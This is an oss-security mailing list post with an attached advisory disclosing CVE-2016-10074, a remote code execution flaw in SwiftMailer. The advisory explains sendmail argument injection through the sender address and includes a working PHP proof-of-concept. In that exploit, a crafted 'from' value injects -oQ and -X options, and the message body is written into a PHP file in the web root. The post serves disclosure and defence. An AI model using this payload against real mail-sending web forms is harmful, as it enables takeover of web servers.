List: oss-security
Subject: [oss-security] SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
From: Dawid Golunski <dawid () legalhackers ! com>
Date: 2016-12-28 18:57:28
Message-ID: CADSYzst+JoCY41vHZeRGXLGGDmBxSjq2r9CHCDyi4y2JHEewjQ () mail ! gmail ! com
SwiftMailer <= 5.4.5-DEV Remote Code Execution
CVE-2016-10074
Discovered by: Dawid Golunski (@dawid_golunski)
https://legalhackers.com
Desc:
Independent research uncovered a critical vulnerability in SwiftMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.
To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the SwiftMailer class.
Despite significant efforts to responsibly disclose the vulnerability to the
vendor (since 2 December), the vulnerability remains unfixed as of 28 December.
The full current advisory at:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Copy attached to this msg.
The Video PoC will be very similar to:
http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
The SwiftMailer PoC exploit:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt
Updates:
https://twitter.com/dawid_golunski
--
Regards,
Dawid Golunski
https://legalhackers.com
t: @dawid_golunski
["SwiftMailer-Exploit.txt" (text/plain)]
__ __ __ __ __
/ / ___ ____ _____ _/ / / / / /___ ______/ /_____ __________
/ / / _ \/ __ `/ __ `/ / / /_/ / __ `/ ___/ //_/ _ \/ ___/ ___/
/ /___/ __/ /_/ / /_/ / / / __ / /_/ / /__/ ,< / __/ / (__ )
/_____/\___/\__, /\__,_/_/ /_/ /_/\__,_/\___/_/|_|\___/_/ /____/
/____/
=============================================
- Discovered by: Dawid Golunski
- dawid[at]legalhackers.com
- https://legalhackers.com
- CVE-2016-10074
- Release date: 28.12.2016
- Revision 1.0
- Severity: Critical
=============================================
I. VULNERABILITY
-------------------------
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
II. BACKGROUND
-------------------------
"Swift Mailer is a component-based library for sending e-mails from PHP applications."
"Swift Mailer began back in 2005 as a one-class project for sending mail over SMTP.
It has since grown into the flexible component-based library that is in development today."
SwiftMailer library is used by major PHP projects including some of the
most popular PHP programming frameworks such as Yii2, Laravel, Symfony.
https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/introduction.rst
https://github.com/swiftmailer/swiftmailer/blob/5.x/doc/overview.rst
Symfony / Yii / Laravel frameworks:
http://symfony.com/doc/current/email.html
https://github.com/yiisoft/yii2-swiftmailer
https://laravel.com/docs/5.1/mail
III. INTRODUCTION
-------------------------
Independent research uncovered a critical vulnerability in SwiftMailer that
could potentially be used by (unauthenticated) remote attackers to achieve
remote arbitrary code execution in the context of the web server user and
remotely compromise the target web application.
To exploit the vulnerability an attacker could target common website
components such as contact/feedback forms, registration forms, password
email resets and others that send out emails with the help of a vulnerable
version of the SwiftMailer class.
Despite significant efforts to responsibly disclose the vulnerability to the
vendor, it remains unfixed as of 28 December.
Note: This advisory is limited.
Remaining attack vectors/exploits will be disclosed at a later date to allow
more time for patching.
IV. DESCRIPTION
-------------------------
The SwiftMailer class uses PHP's mail() function as its default transport
(Swift_MailTransport). mail() builds a shell command line for the local
sendmail binary, and the sender (reverse-path) address is passed on that
command line as the -f parameter, so SwiftMailer suffers from the same
argument-injection vulnerability as the one disclosed in PHPMailer:
http://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
The following Sender address:
"Attacker -Param2 -Param3"@test.com
would cause SwiftMailer/mail() to execute /usr/sbin/sendmail with the
following list of arguments:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker -Param2 -Param3@test.com]
which would not work for the attacker: Param2 and Param3 are passed within
the same argument (argv[3]), because the quoted local part survives as a
single shell word.
Attackers can, however, break out of argument no. 3 with some extra escaping.
For example, by injecting a \" sequence after the first word of the local part,
the following Sender email:
"Attacker \" -Param2 -Param3"@test.com
when passed to SwiftMailer (and eventually to mail()) causes sendmail to be
executed with:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fAttacker\]
Arg no. 4 == [-Param2]
Arg no. 5 == [-Param3"@test.com]
As can be seen, this injects two additional parameters (argv[4] and argv[5])
into the sendmail command line. Attackers can exploit this to achieve code
execution as shown in the PoC below.
V. PROOF OF CONCEPT EXPLOIT
-------------------------
<?php
/*
SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
Discovered/Coded by:
Dawid Golunski
https://legalhackers.com
Full Advisory URL:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Video PoC
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Follow the feed for updates:
https://twitter.com/dawid_golunski
A simple PoC (working on Sendmail MTA)
It will inject the following parameters to sendmail command:
Arg no. 0 == [/usr/sbin/sendmail]
Arg no. 1 == [-t]
Arg no. 2 == [-i]
Arg no. 3 == [-fattacker\]
Arg no. 4 == [-oQ/tmp/]
Arg no. 5 == [-X/var/www/cache/phpcode.php]
Arg no. 6 == ["@email.com]
which will write the transfer log (-X) into /var/www/cache/phpcode.php file.
Note /var/www/cache must be writable by www-data web user.
The resulting file will contain the payload passed in the body of the msg:
09607 <<< Content-Type: text/html; charset=us-ascii
09607 <<<
09607 <<< <?php phpinfo(); ?>
09607 <<<
09607 <<<
09607 <<<
See the full advisory URL for the exploit details.
*/
// Attacker's input coming from untrusted source such as $_GET , $_POST etc.
// For example from a Contact form with sender field
$email_from = '"attacker\" -oQ/tmp/ -X/var/www/cache/phpcode.php "@email.com';
// ------------------
// mail() param injection via the vulnerability in SwiftMailer
require_once 'lib/swift_required.php';
// Mail transport
$transport = Swift_MailTransport::newInstance();
// Create the Mailer using your created Transport
$mailer = Swift_Mailer::newInstance($transport);
// Create a message
$message = Swift_Message::newInstance('Swift PoC exploit')
->setFrom(array($email_from => 'PoC Exploit Payload'))
->setTo(array('receiver@domain.org', 'other@domain.org' => 'A name'))
->setBody('Here is the message itself')
;
// Send the message with PoC payload in 'from' field
$result = $mailer->send($message);
~~~~~~~~~~~
The researcher also developed an Unauthenticated RCE exploit for a popular
open-source application (deployed on the Internet on more than a million servers)
as a PoC for real-world exploitation. It might be published after the vendor has
fixed the vulnerabilities.
Video PoC:
~~~~~~~~~~~~~
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
VI. BUSINESS IMPACT
-------------------------
Successful exploitation could let remote attackers gain access to the target
server in the context of the web server account, which could lead to a full
compromise of the web application.
VII. SYSTEMS AFFECTED
-------------------------
All versions of SwiftMailer including the latest of 5.4.5-DEV are affected.
VIII. SOLUTION / VENDOR RESPONSE
-------------------------
The vulnerability was responsibly disclosed to the SwiftMailer vendor.
The first contact attempts started on the 2nd of December.
Unfortunately, the vendor has not fixed the SwiftMailer library to date and
it remains vulnerable.
Because of this, users of SwiftMailer (which include various frameworks that make
use of the library) remain at risk.
The vendor was advised by the researcher of the upcoming exploit for another
library (PHPMailer) which, when published along with the new release, would make
it possible for malicious users to "connect the dots" and use the same payloads
to attack SwiftMailer users.
The last attempt at contact (resending the tested PoC exploit) was made on Dec 26th,
to which the vendor has not replied.
Since, after the publication of the PHPMailer exploit, other users did start to see
the similarities and file public vulnerability reports, there is no longer any point
in keeping this advisory private.
MITRE assigned the following CVE ID to this vulnerability, upon the request made by
the researcher:
CVE-2016-10074
IX. REFERENCES
-------------------------
https://legalhackers.com
This (CVE-2016-10074) advisory:
https://legalhackers.com/advisories/SwiftMailer-Exploit-Remote-Code-Exec-CVE-2016-10074-Vuln.html
Video PoC:
https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
Exploit code:
Simple PoC shown above is available here:
https://legalhackers.com/exploits/CVE-2016-10074/SwiftMailer_PoC_RCE_Exploit.txt
Other exploits with other attack vectors will be disclosed at a later date to
allow more time for patching.
CVE-2016-10074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10074
SwiftMailer github
https://github.com/swiftmailer/swiftmailer
X. CREDITS
-------------------------
The vulnerability has been discovered by Dawid Golunski
dawid (at) legalhackers (dot) com
https://legalhackers.com
Thanks to SecuriTeam for help with disclosing the vulnerability to the vendor.
XI. REVISION HISTORY
-------------------------
28.12.2016 - Limited advisory released
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with
no warranties or guarantees of fitness of use or otherwise. I accept no
responsibility for any damage caused by the use or misuse of this information.